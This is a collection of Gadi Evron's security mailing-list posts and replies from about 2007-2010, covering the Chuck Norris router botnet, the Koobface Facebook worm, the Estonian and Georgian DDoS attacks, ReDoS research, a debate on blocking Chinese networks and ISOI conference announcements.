Paper on the law and Implantable Devices security

[Gadi Evron]

A new research paper from the Freedom And Law Center deals with issues 
that some of us keep raising these past few years, and does a good job 
at it - bionic hacking (or cybernetic hacking if you prefer).


"Killed by Code: Software Transparency in Implantable Medical Devices" 
outlines some of the history of these devices and even shows some cases 
where devices have been recalled (likely due to software issues).


Some of the paper's recommendations are especially interesting, such as 
to create a database of implantable devices code, so that if the vendor 
disappears it can still be patched (I rephrased).


While unintentional, I am considered the father of this field (not that 
I'm complaining) and I can't even begin to tell you how excited I am 
that a field I have been evangelizing for some years now if finally 
getting more attention -- even if from the legal standpoint with the 
main concern of liability.


Still, I can't help but maintain some skepticism that before some 
disaster happens (to us or others) this won't be taken too seriously.


The paper can be found here:
http://www.softwarefreedom.org/resources/2010/transparent-medical-devices.html

Here's a 2007 Wired article covering the subject from a talk I gave, 
covering the subject from a different perspective:

http://www.wired.com/threatlevel/2007/08/will-the-bionic/

Gadi.

Chuck Norris Botnet and Broadband Routers

[Gadi Evron]

Last week Czech researchers released information on a new worm which 
exploits CPE devices (broadband routers) by means such as default 
passwords, constructing a large DDoS botnet. Today this story hit 
international news.


Original Czech:
http://praguemonitor.com/2010/02/16/czech-experts-uncover-global-virus-network

English:
http://www.pcworld.com/businesscenter/article/189868/chuck_norris_botnet_karatechops_routers_hard.html

When I raised this issue before in 2007 on NANOG, some other vetted 
mailing lists and on CircleID, the consensus was that the vendors will 
not change their position on default settings unless "something 
happens", I guess this is it, but I am not optimistic on seeing activity 
from vendors on this now, either.


CircleID story 1:
http://www.circleid.com/posts/broadband_routers_botnets/

CircleID story 2:
http://www.circleid.com/posts/broadband_router_insecurity/

The spread of insecure broadband modems (DSL and Cable) is extremely 
wide-spread, with numerous ISPs, large and small, whose entire (read 
significant portions of) broadband population is vulnerable. In tests 
Prof. Randy Vaughn and I conducted with some ISPs in 2007-8 the results 
have not been promising.


Further, many of these devices world wide serve as infection mechanisms 
for the computers behind them, with hijacked DNS that points end-users 
to malicious web sites.


On the ISPs end, much like in the early days of botnets, many service 
providers did not see these devices as their responsibility -- even 
though in many cases they are the providers of the systems, and these 
posed a potential DDoS threat to their networks. As a mind-set, 
operationally taking responsibility for devices located at the homes of 
end users made no sense, and therefore the stance ISPs took on this 
issue was understandable, if irresponsible.


As we can't rely on the vendors, ISPs should step up, and at the very 
least ensure that devices they provide to their end users are properly 
set up (a significant number of iSPs already pre-configure them for 
support purposes).


The Czech researchers have done a good job and I'd like to thank them 
for sharing their research with us.


In this article by Robert McMillan, some details are shared in English:

--
Discovered by Czech researchers, the botnet has been spreading by taking 
advantage of poorly configured routers and DSL modems, according to Jan 
Vykopal, the head of the network security department with Masaryk 
University's Institute of Computer Science in Brno, Czech Republic.


The malware got the Chuck Norris moniker from a programmer's Italian 
comment in its source code: "in nome di Chuck Norris," which means "in 
the name of Chuck Norris." Norris is a U.S. actor best known for his 
martial arts films such as "The Way of the Dragon" and "Missing in Action."


Security experts say that various types of botnets have infected 
millions of computers worldwide to date, but Chuck Norris is unusual in 
that it infects DSL modems and routers rather than PCs.


It installs itself on routers and modems by guessing default 
administrative passwords and taking advantage of the fact that many 
devices are configured to allow remote access. It also exploits a known 
vulnerability in D-Link Systems devices, Vykopal said in an e-mail 
interview.


A D-Link spokesman said he was not aware of the botnet, and the company 
did not immediately have any comment on the issue.


Like an earlier router-infecting botnet called Psyb0t, Chuck Norris can 
infect an MIPS-based device running the Linux operating system if its 
administration interface has a weak username and password, he said. This 
MIPS/Linux combination is widely used in routers and DSL modems, but the 
botnet also attacks satellite TV receivers.

--

Read more here:
http://www.pcworld.com/businesscenter/article/189868/chuck_norris_botnet_karatechops_routers_hard.html

I will post updates on this as I discover them on my blog, under this 
same post, here:

http://gadievron.blogspot.com/2010/02/chuck-norris-botnet-and-broadband.html

Gadi.

Re: All China, All The Time

[Gadi Evron]

On 1/15/10 6:40 PM, Thor (Hammer of God) wrote:

I could only imagine.  The other problem is that many people seem to think I'm 
saying something against the Chinese *people* themselves, based on the "f* you 
round-eye* messages I've received (and they call ME racist).  They don't seem to get 
the clear distinction (to me) between the Chinese people and China's network.  It's 
the machines I'm concerned with the attacks coming from those machine.  Just because 
the machine is sourced in China doesn't mean the attacker is - so I have to do the 
best I can to defend against the machines.  However, that unfortunately comes across 
to those who choose not to think it through as me saying something against the 
Chinese themselves.

Then again, as you well know, people will take any opportunity they can just to 
be ugly and confrontational, and to have something to rail about.  In the face 
of the reality of China's horribly infected network, when I suggest blocking 
that traffic (as many others have and do), they seize the opportunity to call 
me prejudice and a racist.


The Chinese network is indeed very infected, which in turn causes the 
rest of the world great computerized harm. Nobody disputes this.


The solution of blocking China, however, is one which harms both people 
outside of China, as well as those inside of China. Therefore, it 
translates into an attack on them.


Looking it this operationally:

1. Functionality

Do you have clients who need to interconnect with China's
networks, or expect people to connect to you from China?

If so, the cost of security by blocking may be unjustifiable.

2. Urgency

If a lot of IP sources attack you from China RIGHT NOW, and you
need immediate mitigation, blocking China short-term may work,
but obviously not as a permanent solution.

As to "getting rid" or "refusing to connect with" networks with 
extremely bad reputation, that may be quite acceptable on an individual 
bases, but not on the Internet-scale, as things stand right now.


When I facilitated making Atrivo (and others) no longer welcome on the 
Internet, it was a brand new move, and it helped change the social 
belief of "don't be the Internet's firewall" to "some bad actors 
shouldn't be here, but generally don't be the Internet's firewall."


Such social change to encourage new technological and operational 
solutions happenes every 2-5 years or so, and I don't expect anything 
large enough such as an AS-based reputation system to happen anytime soon.


Also, you should consider that such actions also have direct political 
and diplomatic ramifications neither of us understands.


So, for now, I'd say that each of us should make such decisions by our 
own risk analysis with the trade-off between costs and benefits in mind, 
and only for our own networks.


Aside to that, I know some people in China who work very hard on 
security, and do a better job than we do at it. But that does not mean 
the situation as it stands now is acceptable.



IOW, I really don't think the tag had that much to do with it now...


People are just picking on you because they can. I can only share how I 
see such Internet discussions.


Cost of doing business, just consider your responses on a level of (time 
== money) && what your response would gain for you or the community. If 
the answer is nothing, then examine whether you still believe it is 
worth it. If yes, just do it. If not, move along.


That is my basic guideline after years of trial by fire.

Also, you will always be misunderstood, be careful in your language, but 
not so much that tl;dr. State your case with the obvious exceptions, and 
discuss misunderstandings later. As trying to anticipate everything as 
an opposite example to just saying what you think would mean people will 
just nitpick on one lower-hanging fruit item, or ignore.


Gadi.



T




-Original Message-
From: Gadi Evron [mailto:g...@linuxbox.org]
Sent: Thursday, January 14, 2010 6:27 PM
To: Thor (Hammer of God)
Cc: bugtraq@securityfocus.com
Subject: Re: All China, All The Time

On 1/14/10 8:09 AM, Thor (Hammer of God) wrote:

So, apparently my "witty" tag via Google Translate means something I

didn't quite mean.  Surprise, surprise.  Luckily it wasn't something
vulgar, (that's what I get for trusting Google Translate and trying to
be funny) but what I meant it to say was "If you can read this, don't
bother replying because my servers won't get it."  However, it seems to
mean something like "don't reply because you are not welcome here" or
similar.  That wasn't my intention, as it seems to infer I actually
have something against the Chinese people and not their networks, which
I take issue with.


Sorry for the poorly

NSA Iraqi Computer Attacks And U.S. Defense

[Gadi Evron]

In a recent article in the National Journal Magazine, the NSA
supposedly admits to using computer attacks in Iraq, attacking
cellular systems. Aside to the hacking part, which is obviously
"cool", the impact on the US cyber defense stance as well as
international relations is staggering.

I spent some time trying to figure out what facts were given in the
story, and analyze it.

Original story:
http://www.nationaljournal.com/njmagazine/cs_20091114_3145.php

My clean-up and analysis:
http://darkreading.com/blog/archives/2009/11/nsa_iraqi_compu.html

   Gadi.


--
Gadi Evron,
g...@linuxbox.org.

Blog: http://gevron.livejournal.com/

Announcement: Critical Internet Infrastructure WG is now open to public participation

[Gadi Evron]

ISOTF Critical Internet Infrastructure WG is now open to public
participation.

The group holds top experts on internet technology, critical
infrastructure, and internet governance, from around the globe.

Together, we discuss definitions, problems, challenges and solutions in
securing and assuring the reliability of the global internet
infrastructure, which is critical infrastructure for a growing number of
nations, corporations and indeed, individuals -- world wide.

The group started as a closed and private forum, to discuss technical
and operational risks, as other venues limited discussion of critical
internet resources to politically charged subjects such ascontrol of
ICANN and ARIN, thus overshadowing other important aspects.

As of November 18th 2009, the list is open for public access, to advance
public awareness of the issues, and bring new talent on board.

The group is hosted by the ISOTF, but is governed by members.

Note: SCADA, network operations, and other related issues should be
discussed in the appropriate forums, elsewhere. This group deals with
the internet.

To subscribe:
http://isotf.org/mailman/listinfo/cii

Gadi Evron for ISOTF-CII-WG.

Re: Regular Expression Denial of Service

[Gadi Evron]

Thierry Zoller wrote:

Hi ,

With all due respect - this is known to be a vulnerability class since
over  a  century.  Just  because  it  doesn't  have a acronym à la XSS
doesn't mean it's not known to be a vulnerability. Can we please stop
the  attitude of inventing acronyms for vulnerabilites, making it look
like it's something new and funky.

It's  the  impact  of  something  that makes it a vulnerability no the
name.


Thierry, you are quite right. However, I don't think they claimed it was 
a new class of vulnerabilities, and the responses since just added data 
to it. So I think that while you are factually correct, you misread 
their post. They shared their research with us.


Gadi.





GE> Alex Roichman wrote:

Checkmarx Research Lab presents a new attack vector on Web applications. By
exploiting the Regular Expression Denial of Service (ReDoS) vulnerability an
attacker can make a Web application unavailable to its intended users. ReDoS
is commonly known as a “bug” in systems, but Alex Roichman and Adar Weidman
from Checkmarx show how serious it is and how using this technique, various
applications can be “ReDoSed”. These include, among others, Server-side of
Web applications and Client-side Browsers. The art of attacking the Web by
ReDoS is by finding inputs which cannot be matched by Regexes and on these
Regexes a Regex-based Web systems get stuck.

For further reading:
http://www.checkmarx.com/NewsDetails.aspx?id=23&cat=3


GE> Alex, nice work. Thank you for sharing it with us.

GE> I'd recommend taking a look at Ilja van Sprundel's work with regular 
GE> expression bugs in his Unusual bugs presentation.

GE> ... Where he played a bit with Google Code Search back in 2007, I think.
GE> He helped Google out by giving them his research, of course.

GE> I found two versions online:
GE> http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
GE> http://www.slideshare.net/amiable_indian/unusual-bugs

GE> Ilja and I later discussed creating a real regex fuzzer to discover 
GE> vulnerabilities, but I at least never had the time to play with it. He

GE> might have, I am CC:ing him.

GE> My best to Adar,

GE> Gadi Evron,
GE> http://www.gadievron.com/

Re: Regular Expression Denial of Service

[Gadi Evron]

Alex Roichman wrote:

Checkmarx Research Lab presents a new attack vector on Web applications. By
exploiting the Regular Expression Denial of Service (ReDoS) vulnerability an
attacker can make a Web application unavailable to its intended users. ReDoS
is commonly known as a “bug” in systems, but Alex Roichman and Adar Weidman
from Checkmarx show how serious it is and how using this technique, various
applications can be “ReDoSed”. These include, among others, Server-side of
Web applications and Client-side Browsers. The art of attacking the Web by
ReDoS is by finding inputs which cannot be matched by Regexes and on these
Regexes a Regex-based Web systems get stuck.

For further reading:
http://www.checkmarx.com/NewsDetails.aspx?id=23&cat=3


Alex, nice work. Thank you for sharing it with us.

I'd recommend taking a look at Ilja van Sprundel's work with regular 
expression bugs in his Unusual bugs presentation.
... Where he played a bit with Google Code Search back in 2007, I think. 
He helped Google out by giving them his research, of course.


I found two versions online:
http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
http://www.slideshare.net/amiable_indian/unusual-bugs

Ilja and I later discussed creating a real regex fuzzer to discover 
vulnerabilities, but I at least never had the time to play with it. He 
might have, I am CC:ing him.


My best to Adar,

Gadi Evron,
http://www.gadievron.com/

CFP: ISOI 7 - Sept 17, 18 - San Diego

[Gadi Evron]

The 7th ISOI (Internet Security Operations and Intelligence) will take
place on September 17th and 18th in San Diego, California.

ISOI 7 is kindly hosted by Websense and ESET. The evening reception is
graciously hosted by Facebook.

An early draft agenda can be found here: http://isotf.org/isoi7.html

While attendance is very limited as explained below, it is free of charge.

For previous agendas, please take a look at:

http://isotf.org/isoi6.html (hosted by University of Texas, Dallas,
Baylor and Sunbelt)
http://isotf.org/isoi5.html (hosted by Estonian CERT with reception by
Norman)
http://isotf.org/isoi4.html (hosted by Yahoo!)
http://isotf.org/isoi3.html (hosted by ISOC, Afilias and ICANN)
http://isotf.org/isoi2.html (hosted by Microsoft with reception by
Trendmicro)
http://isotf.org/isoi.html (hosted by Cisco with reception by ISC)

CFP:

We solicit proposals for presentations from the public. A short abstract
(with data to back it up) can be sent to cont...@isotf.org.

The main topics of interest are Internet infrastructure defense, cyber
crime, online fraud, phishing, DDoS and botnets. We also solicit
proposals for debates.

While the conference and groups are vetted, we believe in public
involvement and making information public whenever possible. Therefore,
we once again keep a couple of agenda slots open for the public.

Background:
---
ISOI is a closed conference for members of the different Internet
security operations communities, bringing different groups together
(such as MWP, nsp-sec, MAAWG, etc.)

In the conference you will find professionals from many industries:
network operators, anti virus researchers, law enforcement, academia and
government officials from around the world.

Personal note:
--
It's time to let ISOI fly free, I will not be attending this one. I
would like to use this opportunity to thank Randy Vaughn, Dan Hubbard
and Jeff Debrosse for their efforts in making ISOI 7 happen.

Cordially yours,

Gadi.


--
Gadi Evron,
g...@linuxbox.org.

Blog: http://gevron.livejournal.com/

one shot remote root for linux?

[Gadi Evron]

Sometimes news finds us in mysterious yet obvious ways.

HD set a status which I noticed on my twitter:

@hdmoore reading through sctp_houdini.c - one-shot remote linux kernel
root - http://kernelbof.blogspot.com/

I asked him about it on IM, wondering if it is real:
"looks like that
but requires a sctp app to be running"

Naturally, I retweeted.

Signed,

@gadievron

reliable IOS exploitation

[Gadi Evron]

FX has given a comprehensive talk about IOS exploitation (including even TCL 
scripts operators leave behind when they moved jobs to retain access).


He has shown effective and ineffective ways of detecting compromise in IOS.

Then, he has shown how reliable exploitation of IOS routers works.

His talk will probably be downloadable from the CCC (25C3) web site by 
tomorrow.


Gadi.

ISOI 6, Dallas, TX - January 29, 30

[Gadi Evron]

Hi all. ISOI is once again happening, and back to the States.

Almost final agenda: http://isotf.org/isoi6.html

As usual, while attendance is limited to the folks who are busy "saving the 
Internet"/"fighting crime", it is free of charge.


Once again we offer the public at-large the opportunity to attend without such 
membership. The process is: you submit a relevant talk, get vetted and get 
accepted. We have two slots reserved for such a purpose.


Subjects of interest: case studies, attacks, botnets, fraud, ...
To submit email your talk idea to [EMAIL PROTECTED]

Is it time to say merry Xmas yet?

Gadi.

[funsec] ICANN Terminates EstDomains' Registrar Accreditation (fwd)

[Gadi Evron]

-- Forwarded message --
Date: Tue, 28 Oct 2008 20:47:48 -0700
From: Paul Ferguson <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [funsec] ICANN Terminates EstDomains' Registrar Accreditation

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

"Dear Mr. Tsastsin,

"Be advised that the Internet Corporation for Assigned Names and Numbers
(ICANN) Registrar Accreditation Agreement (RAA) for EstDomains, Inc.
(customer No. 919, IANA No. 943) is terminated..."

Via ICANN.org:
http://www.icann.org/correspondence/burnette-to-tsastsin-28oct08-en.pdf

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.6.3 (Build 3017)

wj8DBQFJB9zaq1pz9mNUZTMRAiNOAKCKGwfwxJxnCxR/5zo4wU77enGQRACeKCY7
Sc2Bwob4aRRtRocYArtoVtU=
=ggSS
-END PGP SIGNATURE-


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Estonian Cyber Security Strategy document -- now available online

[Gadi Evron]

Hello.

The Estonian cyber security strategy document is now available online.
I must say once again the concept of a national cyber security stance is 
quite interesting.


Those who wish to download the document::
http://www.mod.gov.ee/?op=body&id=518

My contact there specified she'd be happy to answer any questions. To 
avoid spam of her inbox, email me for her address.


Gadi Evron.

community real-time BGP hijack notification service

[Gadi Evron]

Hi, WatchMy.Net is a new community service to alert you when your prefix
has been hijacked, in real-time.

Following the discussion on NANOG a couple of weeks ago on what to do if
your prefix is hijacked, people mentioned that detection-wise, free
services are limited (to certain communities or by not being real-time).

The current fully public and free services will alert you with a few
hours delay.

Over labor day weekend we built a free real-time service. We invite people to 
try it out during our beta stage.


Register for alerts at:
http://www.watchmy.net/

We hope you find it useful,
Avi Freedman, Andrew Fried && Gadi Evron.

reviving the botnets@ mailing list: a new statregy in fighting cyber crime

[Gadi Evron]

The public botnets@ mailing list, where malicious activity on the Internet 
can be openly shared, has been revived, and boy is it active.


Warning: live samples and malicious URLs are openly shared there.

Mailing list URL: 
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Reasons, thinking and explanations:
http://gadievron.blogspot.com/2008/08/public-sharing-and-new-statregy-in.html

Excerpt:
--
A couple of years ago I started a mailing list where folks not necessarily 
involved with the vetted, trusted, closed and snobbish circles of cyber 
crime fighting (some founded by me) could share information and be 
informed of threats.


In this post I explore some of the history behind information sharing 
online, and explain the concept behind the botnets mailing list. Feel free 
to skip ahead if you find the history boring. Also, do note the history in 
this post is mixed with my own opinions. As I am one of the only people 
who where there in the beginning though and lived through all of it, I 
feel free to do so (in my own blog post).


As I conclude, we may not be able to always share our resources, but it is 
time to change the tide of the cyber crime war, and strategize. One of the 
strategies we need to use, or at least try, is public information sharing 
of "lesser evils" already in the public domain.


..
..

To fight a war, you have to be involved and engaged. On the Internet that 
is very difficult, but the Russians found a way. It is a fact that while 
we made much progress in our efforts fighting cyber crime, we had nearly 
no effect what-so-ever on the criminals and the attackers. Non. They 
maintain their business and we play at writing analysis and whack-a-mole.


Using the botnets mailing list, I am burrowing a page from the apparent 
Russian cyber war doctrine, getting people involved, engaged. Personally 
aware and a part of what's going on.


It can't hurt us, and perhaps now, four years over-due and two years after 
the previous attempt, we may be ready to give it a go and test the 
concept.

---

Gadi Evron.

--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant 
General,
   Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprication quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron

Internet attacks against Georgian web sites

[Gadi Evron]

In the last days news and government web sites in Georgia suffered DDoS 
attacks. While these attacks seem to affect the Georgian Internet, it is still 
there.


Facts:
1. There are botnet attacks against .ge websites.
2. These attacks affect the .ge Internet infrastructure, but it's reachable.
3. It doesn't seem Internet infrastructure is directly attacked.
4. Every other political tension in the past 10 years, from a comic of the 
Prophet Muhammad to the war in Iraq, were followed by online supporters 
attacking targets which seem affiliated with the opposing side, and vise-versa.


Up to the Estonian war, such attacks would be called "hacker enthusiast 
attacks" or "cyber terrorism" (of the weak sort). Nowadays any attack with a 
political nature seems to get the "information warfare" tag. When 300 
Lithuanian web sites were defaced last month, "cyber war" was the buzzword.


Running security for the Israeli government Internet operation and later the 
Israeli government CERT such attacks were routine, and just by speaking on them 
in the local news outlets I started bigger so-called "wars" when enthusiasts 
responded in the story comments and then attacks the "other side".


Not every fighting is warfare. While Georgia is obviously under a DDoS attacks 
and it is political in nature, it doesn't so far seem different than any other 
online after-math by fans. Political tensions are always followed by online 
attacks by sympathizers.


Could this somehow be indirect Russian action? Yes, but considering Russia is 
past playing nice and uses real bombs, they could have attacked more strategic 
targets or eliminated the infrastructure kinetically.


Coulda, shoulda… the nature of what's going on isn't clear, but until we are 
certain anything state-sponsored is happening on the Internet it is my official 
opinion this is not warfare, but just some unaffiliated attacks by Russian 
hackers and/or some rioting by enthusiastic Russian supporters.


It is too early to say for sure what this is and who is behind it.

The RBN blog (following the Russian Business Network) is of a different 
opinion:

http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare.html
and:
http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare-2-sat-16-00.html

Also, Renesys has been following the situation and provides with some data:
http://www.renesys.com/blog/2008/08/georgia_clings_to_the_net.shtml

(Thanks to Paul Ferguson for the URLs)

DDoS attacks harm the Internet itself rather than just this or that web site, 
so soon this may require some of us in the Internet security operations 
community getting involved in mitigating the attacks, if they don't just drop 
on their own.


Gadi Evron.

--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant 
General,
   Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprication quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron

Re: [funsec] facebook messages worm

[Gadi Evron]

On Thu, 7 Aug 2008, Juha-Matti Laurio wrote:

It has the following mechanism according to McAfee:
http://vil.nai.com/vil/content/v_148955.htm

They use name W32/Koobface.worm and Kaspersky (Kaspersky Labs originally 
discovered this threat) uses name Net-Worm.Win32.Koobface.b.


This is going to *possibly* cause support line bottlenecks tomorrow.

This worm is somewhat similar to zlob, here is a link to a kaspersky paper 
on a previous iteration of it, they call it koobface:

http://www.kaspersky.com/news?id=207575670

The worm collects spam subject lines from, and then sends the users 
personal data to the following C&C:

zzzping.com

I spoke with DirectNIC last night and the Registrar Operations (reg-ops) 
mailing list was updated that the domain is no longer reachable. That was

very fast response time from DirectNIC, which we appreciate.

The worm is still fast-spreading, watch the statistics as they fly:
http://www.d9.pl/system/stats.php

The facebook security team is working on this, and they are quite capable. 
The security operations community has been doing analysis and

take-downs, but the worm seems to still be spreading.

All anti virus vendors have been notified, and detection (if not removal) 
should be added within a few hours to a few days.


For now, while users may get infected, their information is safe (UNLESS 
the worm has a secondary contact C&C which I have not verified yet).


It seems like some users may have learned not to click on links in email, 
but any other medium does not compute.


Gadi.



More information here too:
http://www.pcmag.com/article2/0,2817,2327272,00.asp

Juha-Matti

"John C. A. Bambenek, GCIH, CISSP" [EMAIL PROTECTED] kirjoitti: 

What's the infection vector?  URL Link?  Rouge Facebook app?

On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron <[EMAIL PROTECTED]> wrote:

> Hi all.
>
> There's a facebook (possibly worm) something malicious sending fake
> messages from real users (friends).
>
> The sample also has a remote drop site (verified by someone who shall
> remain nameless).
>
> This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his 
help.

>
> Infection sites seen so far are on .pl domains.
>
> The AV industry will soon add detection.
> Facebook's security folks are very capable, so I am not worried on that
> front.
>
> It's not that we didn't expect this for a long time now, but...
> Be careful. Some users know to be careful in email.. but not on facebook.
>
> Note: unlike 2003 when we called everything a worm and the 90s when
> everything was a virus--this is a bot which also spreads/infects on
> facebook.
>
>Gadi.
>
>
> --
> "You don't need your firewalls! Gadi is Israel's firewall."
> -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the
> Accountant General,
>Israel's Ministry of Finance, at the government's CIO conference,
> 2005.
>
> (after two very funny self-deprication quotes, time to even things 
up!)

>
> My profile and resume:
> http://www.linkedin.com/in/gadievron

facebook messages worm

[Gadi Evron]

Hi all.

There's a facebook (possibly worm) something malicious sending fake 
messages from real users (friends).


The sample also has a remote drop site (verified by someone who shall 
remain nameless).


This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not worried on that 
front.


It's not that we didn't expect this for a long time now, but...
Be careful. Some users know to be careful in email.. but not on facebook.

Note: unlike 2003 when we called everything a worm and the 90s when 
everything was a virus--this is a bot which also spreads/infects on facebook.


Gadi.


--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant 
General,
   Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprication quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron

Re: [funsec] facebook messages worm

[Gadi Evron]

http://www.kaspersky.com/news?id=20757567
7 days of seeding to impact.

Gadi.


On Wed, 6 Aug 2008, Gadi Evron wrote:


Hi all.

There's a facebook (possibly worm) something malicious sending fake
messages from real users (friends).

The sample also has a remote drop site (verified by someone who shall
remain nameless).

This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not worried on that
front.

It's not that we didn't expect this for a long time now, but...
Be careful. Some users know to be careful in email.. but not on facebook.

Note: unlike 2003 when we called everything a worm and the 90s when
everything was a virus--this is a bot which also spreads/infects on facebook.

Gadi.


--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant 
General,
   Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprication quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron
___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Re: [funsec] facebook messages worm

[Gadi Evron]

I am constantly updating on this on my twitter account to avoid 
list clutter: 
http://twitter.com/gadievron


You can watch the infection live on a web counter from the hosting 
provider that the worm points to. This thing is fast-spreading.


Gadi.


On Wed, 6 Aug 2008, Gadi Evron wrote:


Hi all.

There's a facebook (possibly worm) something malicious sending fake
messages from real users (friends).

The sample also has a remote drop site (verified by someone who shall
remain nameless).

This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not worried on that
front.

It's not that we didn't expect this for a long time now, but...
Be careful. Some users know to be careful in email.. but not on facebook.

Note: unlike 2003 when we called everything a worm and the 90s when
everything was a virus--this is a bot which also spreads/infects on facebook.

Gadi.


--
"You don't need your firewalls! Gadi is Israel's firewall."
-- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant 
General,
   Israel's Ministry of Finance, at the government's CIO conference, 2005.

(after two very funny self-deprication quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron
___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Announcement && CFP: ISOI 5, Tallinn Estonia

[Gadi Evron]

The internet Security Operations and Intelligence (ISOI) 5th workshop will 
take place on the 11th and 12th of September, 2008.


Venue: Tallinn, Estonia.
Host: Estonian CERT (www.cert.ee).

Attendance:
While payment is not required, to attend you must be a member of one of 
the vetted operational communities, or contact us directly for special 
consideration.


CFP information:
The topics for the CFP include operational nsp security, Internet 
incident response, Internet fraud, cyber crime investigations and general 
case studies.


You can email your suggestions, including a title, short abstract and 
prefered day and time to me personally up to the 28th of July. Late 
submissions for turbo-talks is possible.


For more information you can check out the web pages for previous ISOI 
workshops:


Yahoo - http://isotf.org/isoi44html
ICANN/ISOC/Afilias - http://isotf.org/isoi3.html
Microsoft - http://isotf.org/isoi2.html
Cisco - http://isotf.org/isoi.html

A perliminary program will become available in a few weeks on:
http://isotf.org/isoi5.html

Gadi Evron && Randy Vaughn.

RE: An account of the Estonian Internet War

[Gadi Evron]

On Tue, 20 May 2008, Viktor Larionov wrote:

Hi Gadi and all the rest of a community,

I work and live in Estonia, and I was a witness to all happening here,
especially on the cyber-sphere starting the first day.

Let's skip the details on the political context of your story, which from my
point of view is far from being neutral, and pass-on to technical part of
it.

First of all, neither I, nor (well as far as I know) anybody here have seen
any evidence that attacks have originated from Russia. I certainly have no
doubt that there may have been adresses located in Russian IP-pools
attacking our government networks, but well we are professionals here, and
we do understand what do botnets mean, do we ?
What concerns the story about blogs and forum activities, well pardon, CNN
also showed pictures of happening in Estonia, so did BBC, EuroNews, MTV3
that gives me no arguments to claim that CNN is behind all that :)

More of that, living here, and working in the IT sector for a half of my
life I have noticed none of increasing hacker activity on my servers. (also
the company servers)
Neither did a lot of my friends here. In fact, yet I have not seen anyone,
except for some political party though, who would have suffered from so
called "cyber-war".
All those stories about banks going offline, etc. etc. etc. - well may I
tell you that my visa was working properly all the time, and my bank was
24/7 available.

This all led me to the conclusion, that all the hush is about a couple (ok,
maybe tens or hundreds) of DDoS attacks being done.
Tell me, how many attacks or ok, attack attempts does your corporate network
suffer during the day ?

What concerns that student you wrote about, well, Gadi please, as far as I
know that was a ping-of-death he commited against the server of one
political party.
And well, if your server goes offline due to a ping of death, the please,
you have security issues, and serious ones... And for me, the story about
"ugly russian hackers" in this context sounds more than hillarious for me.
The more ridiculous it gets if one tries to make an international disaster
of one "lazy admin forgetting to install a firewall".
Give me a break...

In general, a lot of IT experts around here, are concerned that no
"cyber-war" has never happened, everything was going about a couple, maybe
10-20 DDoS attacks which took place, and sleeping admins off duty.
And what concerns the security situation here in Estonia, well I should
agree with you that, yes, our banks have the security which we may trust,
well at least from my point of view. But if we go to the goverment level,
then please...
You don't even need to be a cracker know-it-all of any kind, a plain
skript-kiddie skill will do the trick...e.g. recently checking out one
software package for security breaches we have found a key to a some of 100
Estonian goverment websites + web server user priveleges on the boxes
itself...it took us 15 minutes not even being a security-expert of any sort.
Fortunatelly for the goverment we are the good guys. :)

Generally, pardon Gadi but, your story copies 1:1 the story the officials
tell everybody, and well sorry but mr. Toomas Hendrik-Ilves'es IT skills
leave me in a very grand doubt. So does the story he has no evidence for.
So far the online community has seen none of the evidence the government was
boasting about, a year has gone by - and personally I consider all this a
one big bluff.


Dear Viktor. thank you for sharing your experience and your personal point 
of view, I appreciate that.


As to the banks, indeed actual, eventual, down-time was non consequential 
(for some, 2 hours) while others still did not process credit card 
requests a month later. All-in-all incident response made sure people in 
the streets only found out about certain issues through the press.


As to the technical evidence, indeed, the attacks, while sizable (c'mon, 
4mpps is still big) is almost insignificant when compared with size of 
attacks we have seen in the past. Very small in comparison.


I refuse to take a stand or offer an opinion (amymore) on if it was Russia 
or not, I convey only what I can prove, which on that regard is absolutely 
nothing except for the fact it was organized, ad-hoc or by an entity, you 
can decide for yourself.


It is not my place to take sides or comment politicially, DDoS hurts the 
`net, no matter who is under attack, and that is why the Internet security 
operations community and the CERTs community got involved, as well as 
myself.


Thanks again,

Gadi.

An account of the Estonian Internet War

